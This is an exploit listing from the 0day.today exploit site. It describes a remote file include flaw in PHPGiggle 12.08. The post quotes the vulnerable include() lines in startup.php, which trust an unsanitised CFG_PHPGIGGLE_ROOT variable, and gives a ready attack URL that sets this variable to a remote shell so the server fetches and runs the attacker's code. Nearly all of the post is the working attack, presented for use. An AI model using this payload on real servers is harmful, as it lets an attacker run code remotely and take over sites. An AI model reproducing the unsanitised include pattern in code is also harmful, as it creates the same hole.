[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHPGiggle 12.08 (CFG_PHPGIGGLE_ROOT) File Include Vulnerability

Author
ajann
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1131
Category
web applications
Date add
06-11-2006
Platform
unsorted
===============================================================
PHPGiggle 12.08 (CFG_PHPGIGGLE_ROOT) File Include Vulnerability
===============================================================




*******************************************************************************
# Title  :  Php Giggle  <= 12.08 Remote File Include Vulnerability

# Author :   ajann

# Vuln;

*******************************************************************************
[File]
startup.php
[/File]

[Code,1]
startup.php Error:

..
....
include($CFG_PHPGIGGLE_ROOT . $CFG_MODULE_ROOT .
"/kernel/system/modregistry.inc.php");
include($CFG_PHPGIGGLE_ROOT . $CFG_MODULE_ROOT .
"/kernel/public/msg.func.php");
include($CFG_PHPGIGGLE_ROOT . $CFG_MODULE_ROOT .
"/kernel/public/fileio.func.php");

       //once the file I/O wrapper is brought up, it is convenient to use
       //function fileInclude
....
..

Key [:] CFG_PHPGIGGLE_ROOT=[file]

\Example:

http://target.com/path/modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=[Shell]

# ajann,Turkey
# ...
# Im not Hacker!

http://www.comscripts.com/scripts/php.phpgiggle.565.html =>      T3l0charger



#  0day.today [2024-07-05]  #